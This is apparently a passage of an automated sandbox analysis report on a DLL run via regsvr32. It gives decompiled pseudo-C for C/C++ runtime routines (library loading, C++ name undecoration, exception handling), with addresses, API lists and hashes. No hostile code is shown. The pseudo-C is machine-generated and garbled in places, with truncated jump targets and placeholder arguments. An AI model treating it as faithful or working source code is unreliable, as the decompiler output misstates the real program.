                                                                      0x180053c10
                                                                      0x180053c13
                                                                      0x180053c1d
                                                                      0x180053c24
                                                                      0x180053c29
                                                                      0x180053c2c
                                                                      0x180053c31
                                                                      0x180053c37
                                                                      0x180053c3d
                                                                      0x180053c40
                                                                      0x180053c4c
                                                                      0x180053c56
                                                                      0x180053c67
                                                                      0x180053c72
                                                                      0x180053c78
                                                                      0x180053c82
                                                                      0x180053c88
                                                                      0x180053c8d
                                                                      0x180053c91
                                                                      0x180053c9a
                                                                      0x180053ca3
                                                                      0x180053ca8
                                                                      0x180053cb3
                                                                      0x180053cb9
                                                                      0x180053cc6
                                                                      0x180053ccd
                                                                      0x180053cd3
                                                                      0x180053cdd
                                                                      0x180053cdf
                                                                      0x180053ce8
                                                                      0x180053cf3
                                                                      0x180053cff
                                                                      0x180053d0b
                                                                      0x180053d11
                                                                      0x180053d1f
                                                                      0x180053d23
                                                                      0x180053d2d
                                                                      0x180053d37
                                                                      0x180053d48
                                                                      0x180053d4e
                                                                      0x180053d55
                                                                      0x180053d65
                                                                      0x180053d70
                                                                      0x180053d75
                                                                      0x180053d78
                                                                      0x180053d7d
                                                                      0x180053d81
                                                                      0x180053d86
                                                                      0x180053d8b
                                                                      0x180053d92
                                                                      0x180053d98
                                                                      0x180053d9c
                                                                      0x180053da0
                                                                      0x180053db0
                                                                      0x180053dbf
                                                                      0x180053dc9
                                                                      0x180053dcc
                                                                      0x180053dd0
                                                                      0x180053dd7
                                                                      0x180053de1
                                                                      0x180053de8
                                                                      0x180053df5
                                                                      0x180053dfd
                                                                      0x180053e04
                                                                      0x180053e11
                                                                      0x180053e15
                                                                      0x180053e1d
                                                                      0x180053e20
                                                                      0x180053e31
                                                                      0x180053e34
                                                                      0x180053e39
                                                                      0x180053e46
                                                                      0x180053e49
                                                                      0x180053e4f
                                                                      0x180053e51
                                                                      0x180053e6c
                                                                      0x180053e77
                                                                      0x180053e7d
                                                                      0x180053e83
                                                                      0x180053e85
                                                                      0x180053e8b
                                                                      0x180053e8d
                                                                      0x180053e93
                                                                      0x180053e99
                                                                      0x180053eb3
                                                                      0x180053ebb
                                                                      0x180053ec3
                                                                      0x180053ece
                                                                      0x180053ed6
                                                                      0x180053edf
                                                                      0x180053ee8
                                                                      0x180053eed
                                                                      0x180053ef2
                                                                      0x180053efc
                                                                      0x180053eff
                                                                      0x180053f06
                                                                      0x180053f1c
                                                                      0x180053f22
                                                                      0x180053f26
                                                                      0x180053f28
                                                                      0x180053f2d
                                                                      0x180053f34
                                                                      0x180053f36
                                                                      0x180053f3e
                                                                      0x180053f51
                                                                      0x180053f57
                                                                      0x180053f5f
                                                                      0x180053f69
                                                                      0x180053f6b
                                                                      0x180053f73
                                                                      0x180053f73
                                                                      0x180053f7a
                                                                      0x180053f89
                                                                      0x180053f9c
                                                                      0x180053fa1
                                                                      0x180053fb2
                                                                      0x180053fb6
                                                                      0x180053fb9
                                                                      0x180053fbe
                                                                      0x180053fc3
                                                                      0x180053fc7
                                                                      0x180053fce
                                                                      0x180053fd3
                                                                      0x180053fd8
                                                                      0x180053fdd
                                                                      0x180053fe3
                                                                      0x180053fec
                                                                      0x180053ffb
                                                                      0x180054003
                                                                      0x18005400a
                                                                      0x180054012
                                                                      0x180054017
                                                                      0x18005401c
                                                                      0x180054026
                                                                      0x180054047

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 3606184308-393685449
                                                                      • Opcode ID: 5f5206d139e3b33068af83c96421b7011f95e5e2d578b5c6fca9f6d110486cfb
                                                                      • Instruction ID: eec4f8e132b529f92a55ada1a56cb97c8dd82d25666fba62b312bef895baa645
                                                                      • Opcode Fuzzy Hash: 5f5206d139e3b33068af83c96421b7011f95e5e2d578b5c6fca9f6d110486cfb
                                                                      • Instruction Fuzzy Hash: F8D18D32604B888AEBA29F65E4813DD37B0F7497D8F109115FE8967B9ACF35D698C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00000001180037D34(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                      				void* _t37;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t72;
                                                                      				void* _t75;
                                                                      				signed long long _t76;
                                                                      				long long _t82;
                                                                      				void* _t86;
                                                                      				signed long long _t90;
                                                                      				signed long long _t91;
                                                                      				WCHAR* _t93;
                                                                      				long _t96;
                                                                      				void* _t99;
                                                                      				WCHAR* _t104;
                                                                      
                                                                      				 *((long long*)(_t86 + 8)) = __rbx;
                                                                      				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                      				 *((long long*)(_t86 + 0x18)) = __rsi;
                                                                      				r15d = __ecx;
                                                                      				_t90 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t76 = _t75 | 0xffffffff;
                                                                      				_t72 = _t90 ^  *(0x180000000 + 0x739d0 + _t104 * 8);
                                                                      				asm("dec eax");
                                                                      				if (_t72 == _t76) goto 0x80037e7a;
                                                                      				if (_t72 == 0) goto 0x80037d9d;
                                                                      				_t57 = _t72;
                                                                      				goto 0x80037e7c;
                                                                      				if (__r8 == __r9) goto 0x80037e5f;
                                                                      				_t61 =  *((intOrPtr*)(0x180000000 + 0x73930 + __rsi * 8));
                                                                      				if (_t61 == 0) goto 0x80037dc4;
                                                                      				if (_t61 != _t76) goto 0x80037eb9;
                                                                      				goto 0x80037e4b;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t104, _t99, _t96);
                                                                      				if (_t57 != 0) goto 0x80037e99;
                                                                      				if (GetLastError() != 0x57) goto 0x80037e39;
                                                                      				_t14 = _t57 - 0x50; // -80
                                                                      				_t37 = _t14;
                                                                      				r8d = _t37;
                                                                      				if (E00000001180046E40(_t90) == 0) goto 0x80037e39;
                                                                      				r8d = _t37;
                                                                      				if (E00000001180046E40(_t90) == 0) goto 0x80037e39;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(_t93, _t75);
                                                                      				if (_t57 != 0) goto 0x80037e99;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x73930 + __rsi * 8)) = _t76;
                                                                      				if (__r8 + 4 != __r9) goto 0x80037da6;
                                                                      				_t91 =  *0x80072078; // 0xc949cbcab002
                                                                      				asm("dec eax");
                                                                      				 *(0x180000000 + 0x739d0 + _t104 * 8) = _t76 ^ _t91;
                                                                      				return 0;
                                                                      			}

















                                                                      0x180037d34
                                                                      0x180037d39
                                                                      0x180037d3e
                                                                      0x180037d50
                                                                      0x180037d6b
                                                                      0x180037d72
                                                                      0x180037d7c
                                                                      0x180037d84
                                                                      0x180037d8a
                                                                      0x180037d93
                                                                      0x180037d95
                                                                      0x180037d98
                                                                      0x180037da0
                                                                      0x180037da9
                                                                      0x180037db4
                                                                      0x180037db9
                                                                      0x180037dbf
                                                                      0x180037dd1
                                                                      0x180037dd7
                                                                      0x180037de3
                                                                      0x180037df2
                                                                      0x180037df4
                                                                      0x180037df4
                                                                      0x180037dfa
                                                                      0x180037e0b
                                                                      0x180037e0d
                                                                      0x180037e21
                                                                      0x180037e23
                                                                      0x180037e2b
                                                                      0x180037e37
                                                                      0x180037e43
                                                                      0x180037e52
                                                                      0x180037e58
                                                                      0x180037e6c
                                                                      0x180037e72
                                                                      0x180037e98

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00000000,000000018003744C,?,?,00000000,000000018004140C,?,?,00000003,00000001800286DD), ref: 0000000180037EB3
                                                                      • GetProcAddress.KERNEL32(?,?,00000000,000000018003744C,?,?,00000000,000000018004140C,?,?,00000003,00000001800286DD), ref: 0000000180037EBF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: MZx$api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-2431898299
                                                                      • Opcode ID: 944539fe70760941397bea17fe2596de129e56fa2db16f63e9e12567ebd69a47
                                                                      • Instruction ID: a509efd8cdb1f499b1827a892048b9636cf565de2c255a2e4dd4d76ead7bf1a2
                                                                      • Opcode Fuzzy Hash: 944539fe70760941397bea17fe2596de129e56fa2db16f63e9e12567ebd69a47
                                                                      • Instruction Fuzzy Hash: 2641C271311A4881FAE7DB16AC043D62396BB4DBE4F19C125AE1D8B796EF3CCA4D8340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E00000001180034908(long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, void* __r8, void* __r14, void* __r15, long long _a8, long long _a16) {
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				char _v40;
                                                                      				intOrPtr _v48;
                                                                      				void* _v56;
                                                                      				intOrPtr _t49;
                                                                      				char* _t64;
                                                                      				char* _t67;
                                                                      				char* _t68;
                                                                      				char* _t71;
                                                                      				long long* _t80;
                                                                      				intOrPtr* _t92;
                                                                      				intOrPtr* _t98;
                                                                      				void* _t100;
                                                                      				void* _t108;
                                                                      				void* _t109;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rdi;
                                                                      				_t64 =  *0x800738a8; // 0x0
                                                                      				_t80 = __rcx;
                                                                      				_t98 = __rdx;
                                                                      				if ( *_t64 == 0) goto 0x80034aa4;
                                                                      				if (r8d == 0) goto 0x800349c2;
                                                                      				if ( *_t64 != 0x58) goto 0x800349a6;
                                                                      				 *0x800738a8 = _t64 + 1;
                                                                      				_t92 =  &_v40;
                                                                      				if ( *__rdx != __rcx) goto 0x8003497a;
                                                                      				_v48 = 4;
                                                                      				_v56 = "void";
                                                                      				asm("movaps xmm0, [ebp-0x30]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002E4E4(__rcx, _t92);
                                                                      				goto 0x80034ac1;
                                                                      				_t67 = "void ";
                                                                      				_v48 = 5;
                                                                      				_v56 = _t67;
                                                                      				asm("movaps xmm0, [ebp-0x30]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002E4E4( &_v24, _t92);
                                                                      				goto 0x80034ab6;
                                                                      				if ( *_t67 != 0x5f) goto 0x800349c2;
                                                                      				if ( *((char*)(_t67 + 1)) != 0x5f) goto 0x800349c2;
                                                                      				if ( *((char*)(_t67 + 2)) != 0x5a) goto 0x800349c2;
                                                                      				_t68 = _t67 + 3;
                                                                      				 *0x800738a8 = _t68;
                                                                      				if ( *_t68 != 0x24) goto 0x80034a0d;
                                                                      				if ( *((char*)(_t68 + 1)) != 0x24) goto 0x80034a29;
                                                                      				if ( *((char*)(_t68 + 2)) != 0x54) goto 0x80034a29;
                                                                      				 *0x800738a8 = _t68 + 3;
                                                                      				if ( *_t92 != _t67) goto 0x800349fa;
                                                                      				_v48 = 0xe;
                                                                      				goto 0x80034960;
                                                                      				_t71 = "std::nullptr_t ";
                                                                      				_v48 = 0xf;
                                                                      				goto 0x80034988;
                                                                      				if ( *_t71 != 0x59) goto 0x80034a29;
                                                                      				 *0x800738a8 = _t71 + 1;
                                                                      				E00000001180034AD4(0, __rcx, __rcx,  &_v40, __rdx, _t100, __r8, _t108, _t109);
                                                                      				goto 0x80034ac1;
                                                                      				E00000001180033FA0(_t80,  &_v56,  &_v40, _t98, __r14, __r15);
                                                                      				if (( *(_t98 + 8) & 0x00004000) == 0) goto 0x80034a7c;
                                                                      				_v32 = 0xb;
                                                                      				_v40 = "cli::array<";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002E4E4( &_v24,  &_v40);
                                                                      				E0000000118002E98C("cli::array<",  &_v40,  &_v56);
                                                                      				goto 0x80034a9c;
                                                                      				if (( *(_t98 + 8) & 0x00002000) == 0) goto 0x80034a95;
                                                                      				_v32 = 0xd;
                                                                      				goto 0x80034a49;
                                                                      				_t49 = _v48;
                                                                      				 *_t80 = _v56;
                                                                      				 *((intOrPtr*)(_t80 + 8)) = _t49;
                                                                      				goto 0x80034ac1;
                                                                      				_v32 = _t49;
                                                                      				_v40 = 0x8005fee0;
                                                                      				return E0000000118002E98C( &_v40, _t80, _t98);
                                                                      			}



















                                                                      0x180034908
                                                                      0x18003490d
                                                                      0x18003491a
                                                                      0x180034921
                                                                      0x180034926
                                                                      0x18003492b
                                                                      0x180034934
                                                                      0x18003493d
                                                                      0x180034942
                                                                      0x18003494c
                                                                      0x180034950
                                                                      0x180034959
                                                                      0x180034960
                                                                      0x180034967
                                                                      0x18003496b
                                                                      0x180034970
                                                                      0x180034975
                                                                      0x18003497a
                                                                      0x180034981
                                                                      0x180034988
                                                                      0x180034990
                                                                      0x180034994
                                                                      0x180034999
                                                                      0x1800349a1
                                                                      0x1800349a9
                                                                      0x1800349af
                                                                      0x1800349b5
                                                                      0x1800349b7
                                                                      0x1800349bb
                                                                      0x1800349c5
                                                                      0x1800349cb
                                                                      0x1800349d1
                                                                      0x1800349d7
                                                                      0x1800349e5
                                                                      0x1800349ee
                                                                      0x1800349f5
                                                                      0x1800349fa
                                                                      0x180034a01
                                                                      0x180034a08
                                                                      0x180034a10
                                                                      0x180034a18
                                                                      0x180034a1f
                                                                      0x180034a24
                                                                      0x180034a2d
                                                                      0x180034a39
                                                                      0x180034a42
                                                                      0x180034a49
                                                                      0x180034a51
                                                                      0x180034a59
                                                                      0x180034a5e
                                                                      0x180034a6e
                                                                      0x180034a7a
                                                                      0x180034a83
                                                                      0x180034a8c
                                                                      0x180034a93
                                                                      0x180034a95
                                                                      0x180034a9c
                                                                      0x180034a9f
                                                                      0x180034aa2
                                                                      0x180034aab
                                                                      0x180034aae
                                                                      0x180034ad3

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                      • API String ID: 2943138195-2239912363
                                                                      • Opcode ID: 5c2235b4b13c44f3de0c6a61b134245e048da5deaccdf1b1941d480be5764429
                                                                      • Instruction ID: 0672a1e8a1ddf2d2d4e63cb1501661bcc3046936b7eecf1e85eb6d8f53b5f3b0
                                                                      • Opcode Fuzzy Hash: 5c2235b4b13c44f3de0c6a61b134245e048da5deaccdf1b1941d480be5764429
                                                                      • Instruction Fuzzy Hash: 3F516172A14B5898FB93CF60D8813EE37B0B70C784F55C116EB491AB95DF789258C711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00000001180037C08(long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				signed long long _t41;
                                                                      				intOrPtr _t45;
                                                                      				signed long long _t46;
                                                                      				signed long long _t66;
                                                                      				long _t70;
                                                                      				void* _t73;
                                                                      				WCHAR* _t76;
                                                                      
                                                                      				_t41 = _t66;
                                                                      				 *((long long*)(_t41 + 8)) = __rbx;
                                                                      				 *((long long*)(_t41 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t41 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t41 + 0x20)) = __rdi;
                                                                      				if (__rdx == __r8) goto 0x80037ce9;
                                                                      				_t45 =  *((intOrPtr*)(0x180000000 + 0x73930 + __rsi * 8));
                                                                      				if (_t45 == 0) goto 0x80037c5c;
                                                                      				if (_t45 != 0xffffffff) goto 0x80037d23;
                                                                      				goto 0x80037cdc;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t76, _t73, _t70);
                                                                      				_t46 = _t41;
                                                                      				if (_t41 != 0) goto 0x80037d0a;
                                                                      				if (GetLastError() != 0x57) goto 0x80037cd0;
                                                                      				_t12 = _t46 + 7; // 0x7
                                                                      				r8d = _t12;
                                                                      				if (E00000001180046E40(__r8) == 0) goto 0x80037cd0;
                                                                      				_t13 = _t46 + 7; // 0x7
                                                                      				r8d = _t13;
                                                                      				if (E00000001180046E40(__r8) == 0) goto 0x80037cd0;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t41 != 0) goto 0x80037d0a;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x73930 + __rsi * 8)) = _t41 | 0xffffffff;
                                                                      				if (__rdx + 4 != __r8) goto 0x80037c3e;
                                                                      				return 0;
                                                                      			}










                                                                      0x180037c08
                                                                      0x180037c0b
                                                                      0x180037c0f
                                                                      0x180037c13
                                                                      0x180037c17
                                                                      0x180037c31
                                                                      0x180037c40
                                                                      0x180037c4b
                                                                      0x180037c51
                                                                      0x180037c57
                                                                      0x180037c69
                                                                      0x180037c6f
                                                                      0x180037c75
                                                                      0x180037c7b
                                                                      0x180037c8a
                                                                      0x180037c8c
                                                                      0x180037c8c
                                                                      0x180037ca1
                                                                      0x180037ca3
                                                                      0x180037ca3
                                                                      0x180037cb8
                                                                      0x180037cba
                                                                      0x180037cc2
                                                                      0x180037cce
                                                                      0x180037cd4
                                                                      0x180037ce3
                                                                      0x180037d09

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: MZx$api-ms-$ext-ms-
                                                                      • API String ID: 2559590344-2431898299
                                                                      • Opcode ID: 5dfd716e153ff8dc6f67784dbb2e0a274937979662d9c94c12543286d7aa5aa1
                                                                      • Instruction ID: 51c97bf6eacbcefb0c068b6c983b546afc1cbfd8d0f4e8c0de37eeefdf00e397
                                                                      • Opcode Fuzzy Hash: 5dfd716e153ff8dc6f67784dbb2e0a274937979662d9c94c12543286d7aa5aa1
                                                                      • Instruction Fuzzy Hash: A331A431711B4880EAA38B1698443DA63E5FB4CBE4F199234EE2D43BD1EF38C649C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                      • String ID:
                                                                      • API String ID: 1917832262-0
                                                                      • Opcode ID: f9141f17977d8895f83f3f4710b2a8b7e5a6c529f5a5d007551c790a8f7b7844
                                                                      • Instruction ID: eba73f1c1a0feb06975ad9e4771e11cc40b065d156c3e58978dfc244163e63e3
                                                                      • Opcode Fuzzy Hash: f9141f17977d8895f83f3f4710b2a8b7e5a6c529f5a5d007551c790a8f7b7844
                                                                      • Instruction Fuzzy Hash: FB81F976528B848AD756CF28E45175AF7A5FBC9BC0F108216FA8A93B28DF38D545CF00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E000000011800359D4(void* __ebx, void* __edx, long long __rbx, long long __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r12) {
                                                                      				intOrPtr _t51;
                                                                      				signed int _t55;
                                                                      				signed int _t65;
                                                                      				void* _t66;
                                                                      				signed int _t68;
                                                                      				intOrPtr* _t88;
                                                                      				char* _t89;
                                                                      				char* _t91;
                                                                      				char* _t92;
                                                                      				char* _t93;
                                                                      				char* _t95;
                                                                      				long long* _t128;
                                                                      				void* _t132;
                                                                      				void* _t134;
                                                                      
                                                                      				_t130 = __rsi;
                                                                      				_t100 = __rbx;
                                                                      				_t66 = __ebx;
                                                                      				 *((long long*)(_t134 + 8)) = __rbx;
                                                                      				 *((long long*)(_t134 + 0x10)) = __rdi;
                                                                      				_t132 = _t134 - 0x57;
                                                                      				_t135 = _t134 - 0x90;
                                                                      				_t128 = __rcx;
                                                                      				 *((long long*)(__rcx)) =  *((intOrPtr*)(__rdx));
                                                                      				_t51 =  *((intOrPtr*)(__rdx + 8));
                                                                      				 *((intOrPtr*)(__rcx + 8)) = _t51;
                                                                      				if (_t51 - 1 > 0) goto 0x80035bc3;
                                                                      				_t88 =  *0x800738a8; // 0x0
                                                                      				 *(_t132 + 0xf) =  *(_t132 + 0xf) & 0x00000000;
                                                                      				if ( *_t88 == 0) goto 0x80035b9b;
                                                                      				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                                      				_t10 = _t132 - 9; // 0x5ff7
                                                                      				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                                      				_t13 = _t132 + 7; // 0x6007
                                                                      				 *(_t132 + 7) =  *(_t132 + 7) & 0x00000000;
                                                                      				_t16 = _t132 + 0x17; // 0x6017
                                                                      				 *(_t135 + 0x20) =  *(_t134 - 0x90 + 0x20) & 0x00000000;
                                                                      				r8d = 0;
                                                                      				E000000011800334C4(__rbx, _t16, _t13, __rcx, __rsi, _t10);
                                                                      				r8b = 0x20;
                                                                      				_t19 = _t132 + 0x27; // 0x6027
                                                                      				_t20 = _t132 + 0x17; // 0x6017
                                                                      				E0000000118002E9B8(_t20, _t19);
                                                                      				_t21 = _t132 + 0x37; // 0x6037
                                                                      				E0000000118002E98C(_t88, _t21, _t128);
                                                                      				 *_t128 =  *_t88;
                                                                      				_t55 =  *(_t88 + 8);
                                                                      				 *(_t128 + 8) = _t55;
                                                                      				if (_t55 - 1 > 0) goto 0x80035bc3;
                                                                      				_t89 =  *0x800738a8; // 0x0
                                                                      				if ( *_t89 == 0x40) goto 0x80035b8f;
                                                                      				 *(_t132 + 0xf) = 5;
                                                                      				 *(_t132 + 7) = "{for ";
                                                                      				_t26 = _t132 + 0x17; // 0x6017
                                                                      				asm("movaps xmm0, [ebp+0x7]");
                                                                      				asm("movdqa [ebp+0x17], xmm0");
                                                                      				E0000000118002EAA8("{for ", _t100, _t128, _t26);
                                                                      				_t91 =  *0x800738a8; // 0x0
                                                                      				if ( *(_t128 + 8) - 1 > 0) goto 0x80035b8a;
                                                                      				if ( *_t91 == 0) goto 0x80035b6c;
                                                                      				if ( *_t91 == 0x40) goto 0x80035b62;
                                                                      				_t28 = _t132 + 0x37; // 0x6037
                                                                      				E0000000118002FF80(_t66, _t100, _t28, _t128, _t130, __r12);
                                                                      				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                                      				_t31 = _t132 - 9; // 0x5ff7
                                                                      				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                                      				_t101 = _t91;
                                                                      				E0000000118002EE78(0x60, _t91, _t91, _t31);
                                                                      				_t34 = _t132 + 0x17; // 0x6017
                                                                      				_t35 = _t132 - 9; // 0x5ff7
                                                                      				E0000000118002E98C(_t35, _t34, _t101);
                                                                      				r8b = 0x27;
                                                                      				_t36 = _t132 + 0x47; // 0x6047
                                                                      				_t37 = _t132 + 0x17; // 0x6017
                                                                      				E0000000118002E9B8(_t37, _t36);
                                                                      				E0000000118002EC28( *(_t128 + 8), _t128, _t91, _t101);
                                                                      				_t92 =  *0x800738a8; // 0x0
                                                                      				if ( *_t92 != 0x40) goto 0x80035b2d;
                                                                      				_t93 = _t92 + 1;
                                                                      				 *0x800738a8 = _t93;
                                                                      				_t68 =  *(_t128 + 8);
                                                                      				if (_t68 - 1 > 0) goto 0x80035b8a;
                                                                      				if ( *_t93 == 0x40) goto 0x80035ab1;
                                                                      				 *(_t132 + 0xf) = 2;
                                                                      				 *(_t132 + 7) = 0x80066684;
                                                                      				_t41 = _t132 + 0x27; // 0x6027
                                                                      				asm("movaps xmm0, [ebp+0x7]");
                                                                      				asm("movdqa [ebp+0x27], xmm0");
                                                                      				goto 0x80035a9f;
                                                                      				if (_t68 - 1 > 0) goto 0x80035b8a;
                                                                      				if ( *0x80066684 != 0) goto 0x80035b79;
                                                                      				E0000000118002EBBC(1, _t128, _t41);
                                                                      				E0000000118002EA3C(0x7d, 0x80066684, _t101, _t128, _t41);
                                                                      				_t95 =  *0x800738a8; // 0x0
                                                                      				if ( *_t95 != 0x40) goto 0x80035bc3;
                                                                      				 *0x800738a8 = _t95 + 1;
                                                                      				goto 0x80035bc3;
                                                                      				_t42 = _t132 - 9; // 0x5ff7
                                                                      				 *(_t132 + 7) = 0x8005fee0;
                                                                      				_t44 = _t132 + 7; // 0x6007
                                                                      				E0000000118002E98C(_t44, _t42, _t128);
                                                                      				 *_t128 =  *(_t132 - 9);
                                                                      				_t65 =  *(_t132 - 1);
                                                                      				 *(_t128 + 8) = _t65;
                                                                      				return _t65;
                                                                      			}

















                                                                      0x1800359d4
                                                                      0x1800359d4
                                                                      0x1800359d4
                                                                      0x1800359d4
                                                                      0x1800359d9
                                                                      0x1800359df
                                                                      0x1800359e4
                                                                      0x1800359ee
                                                                      0x1800359f1
                                                                      0x1800359f4
                                                                      0x1800359f7
                                                                      0x1800359fc
                                                                      0x180035a02
                                                                      0x180035a09
                                                                      0x180035a10
                                                                      0x180035a16
                                                                      0x180035a1b
                                                                      0x180035a1f
                                                                      0x180035a23
                                                                      0x180035a27
                                                                      0x180035a2c
                                                                      0x180035a30
                                                                      0x180035a35
                                                                      0x180035a38
